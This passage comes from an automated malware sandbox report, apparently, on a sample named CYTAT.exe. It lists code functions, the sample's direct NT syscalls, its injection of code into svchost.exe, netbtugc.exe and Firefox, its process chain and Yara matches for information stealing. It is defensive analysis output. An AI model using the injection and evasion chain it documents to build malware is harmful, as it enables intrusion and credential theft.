            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03568A90 mov edx, dword ptr fs:[00000030h]4_2_03568A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353EA80 mov eax, dword ptr fs:[00000030h]4_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03604A80 mov eax, dword ptr fs:[00000030h]4_2_03604A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03538AA0 mov eax, dword ptr fs:[00000030h]4_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03538AA0 mov eax, dword ptr fs:[00000030h]4_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03586AA4 mov eax, dword ptr fs:[00000030h]4_2_03586AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B0946 mov eax, dword ptr fs:[00000030h]4_2_035B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D4978 mov eax, dword ptr fs:[00000030h]4_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D4978 mov eax, dword ptr fs:[00000030h]4_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BC97C mov eax, dword ptr fs:[00000030h]4_2_035BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03556962 mov eax, dword ptr fs:[00000030h]4_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03556962 mov eax, dword ptr fs:[00000030h]4_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03556962 mov eax, dword ptr fs:[00000030h]4_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0357096E mov eax, dword ptr fs:[00000030h]4_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0357096E mov edx, dword ptr fs:[00000030h]4_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0357096E mov eax, dword ptr fs:[00000030h]4_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BC912 mov eax, dword ptr fs:[00000030h]4_2_035BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03528918 mov eax, dword ptr fs:[00000030h]4_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03528918 mov eax, dword ptr fs:[00000030h]4_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AE908 mov eax, dword ptr fs:[00000030h]4_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035AE908 mov eax, dword ptr fs:[00000030h]4_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B892A mov eax, dword ptr fs:[00000030h]4_2_035B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C892B mov eax, dword ptr fs:[00000030h]4_2_035C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A9D0 mov eax, dword ptr fs:[00000030h]4_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A9D0 mov eax, dword ptr fs:[00000030h]4_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A9D0 mov eax, dword ptr fs:[00000030h]4_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A9D0 mov eax, dword ptr fs:[00000030h]4_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A9D0 mov eax, dword ptr fs:[00000030h]4_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0353A9D0 mov eax, dword ptr fs:[00000030h]4_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035649D0 mov eax, dword ptr fs:[00000030h]4_2_035649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FA9D3 mov eax, dword ptr fs:[00000030h]4_2_035FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C69C0 mov eax, dword ptr fs:[00000030h]4_2_035C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035629F9 mov eax, dword ptr fs:[00000030h]4_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035629F9 mov eax, dword ptr fs:[00000030h]4_2_035629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BE9E0 mov eax, dword ptr fs:[00000030h]4_2_035BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B89B3 mov esi, dword ptr fs:[00000030h]4_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B89B3 mov eax, dword ptr fs:[00000030h]4_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B89B3 mov eax, dword ptr fs:[00000030h]4_2_035B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035429A0 mov eax, dword ptr fs:[00000030h]4_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035309AD mov eax, dword ptr fs:[00000030h]4_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035309AD mov eax, dword ptr fs:[00000030h]4_2_035309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03560854 mov eax, dword ptr fs:[00000030h]4_2_03560854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03534859 mov eax, dword ptr fs:[00000030h]4_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03534859 mov eax, dword ptr fs:[00000030h]4_2_03534859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03542840 mov ecx, dword ptr fs:[00000030h]4_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BE872 mov eax, dword ptr fs:[00000030h]4_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BE872 mov eax, dword ptr fs:[00000030h]4_2_035BE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C6870 mov eax, dword ptr fs:[00000030h]4_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035C6870 mov eax, dword ptr fs:[00000030h]4_2_035C6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BC810 mov eax, dword ptr fs:[00000030h]4_2_035BC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03552835 mov eax, dword ptr fs:[00000030h]4_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03552835 mov eax, dword ptr fs:[00000030h]4_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03552835 mov eax, dword ptr fs:[00000030h]4_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03552835 mov ecx, dword ptr fs:[00000030h]4_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03552835 mov eax, dword ptr fs:[00000030h]4_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03552835 mov eax, dword ptr fs:[00000030h]4_2_03552835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356A830 mov eax, dword ptr fs:[00000030h]4_2_0356A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D483A mov eax, dword ptr fs:[00000030h]4_2_035D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D483A mov eax, dword ptr fs:[00000030h]4_2_035D483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0355E8C0 mov eax, dword ptr fs:[00000030h]4_2_0355E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356C8F9 mov eax, dword ptr fs:[00000030h]4_2_0356C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356C8F9 mov eax, dword ptr fs:[00000030h]4_2_0356C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035FA8E4 mov eax, dword ptr fs:[00000030h]4_2_035FA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035BC89D mov eax, dword ptr fs:[00000030h]4_2_035BC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03530887 mov eax, dword ptr fs:[00000030h]4_2_03530887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352CF50 mov eax, dword ptr fs:[00000030h]4_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352CF50 mov eax, dword ptr fs:[00000030h]4_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352CF50 mov eax, dword ptr fs:[00000030h]4_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352CF50 mov eax, dword ptr fs:[00000030h]4_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352CF50 mov eax, dword ptr fs:[00000030h]4_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0352CF50 mov eax, dword ptr fs:[00000030h]4_2_0352CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0356CF50 mov eax, dword ptr fs:[00000030h]4_2_0356CF50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03604F68 mov eax, dword ptr fs:[00000030h]4_2_03604F68
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035D0F50 mov eax, dword ptr fs:[00000030h]4_2_035D0F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B4F40 mov eax, dword ptr fs:[00000030h]4_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B4F40 mov eax, dword ptr fs:[00000030h]4_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B4F40 mov eax, dword ptr fs:[00000030h]4_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_035B4F40 mov eax, dword ptr fs:[00000030h]4_2_035B4F40
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_004238DA
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0041F250 SetUnhandledExceptionFilter,0_2_0041F250
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041A208
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00417DAA

            HIPS / PFW / Operating System Protection Evasion

Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtMapViewOfSection: Direct from: 0x77762D1C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtCreateMutant: Direct from: 0x777635CC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtResumeThread: Direct from: 0x777636AC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtProtectVirtualMemory: Direct from: 0x77757B2E
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtReadFile: Direct from: 0x77762ADC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtDelayExecution: Direct from: 0x77762DDC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtQueryInformationProcess: Direct from: 0x77762C26
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtResumeThread: Direct from: 0x77762FBC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtCreateUserProcess: Direct from: 0x7776371C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtSetInformationThread: Direct from: 0x777563F9
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtAllocateVirtualMemory: Direct from: 0x77763C9C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtSetInformationThread: Direct from: 0x77762B4C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtClose: Direct from: 0x77762B6C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtCreateKey: Direct from: 0x77762C6C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtQuerySystemInformation: Direct from: 0x777648CC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtOpenSection: Direct from: 0x77762E0C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtAllocateVirtualMemory: Direct from: 0x77762BEC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtQueryInformationToken: Direct from: 0x77762CAC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtTerminateThread: Direct from: 0x77762FCC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtCreateFile: Direct from: 0x77762FEC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtOpenFile: Direct from: 0x77762DCC
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtOpenKeyEx: Direct from: 0x77762B9C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtSetInformationProcess: Direct from: 0x77762C5C
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | NtProtectVirtualMemory: Direct from: 0x77762F9C
Source: C:\Users\user\Desktop\CYTAT.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 7800
Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
Source: C:\Users\user\Desktop\CYTAT.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2A76008
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_00436CD7 LogonUserW, | 0_2_00436CD7
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, | 0_2_0040D590
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 0_2_00434418
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event, | 0_2_0043333C
Source: C:\Users\user\Desktop\CYTAT.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\CYTAT.exe"
Source: C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\CYTAT.exe | Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, | 0_2_00446124
Source: CYTAT.exe, eMNaOgRkIZi.exe, 0000000A.00000000.1395133969.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000002.3105339658.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106037220.0000000000F40000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: eMNaOgRkIZi.exe, 0000000A.00000000.1395133969.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000002.3105339658.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106037220.0000000000F40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: eMNaOgRkIZi.exe, 0000000A.00000000.1395133969.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000002.3105339658.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106037220.0000000000F40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
            Source: eMNaOgRkIZi.exe, 0000000A.00000000.1395133969.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000A.00000002.3105339658.0000000001190000.00000002.00000001.00040000.00000000.sdmp, eMNaOgRkIZi.exe, 0000000D.00000002.3106037220.0000000000F40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: CYTAT.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\CYTAT.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

Source: Yara match | File source: 4.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.3106282282.0000000002F20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3106163686.0000000003240000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1475778706.0000000003420000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
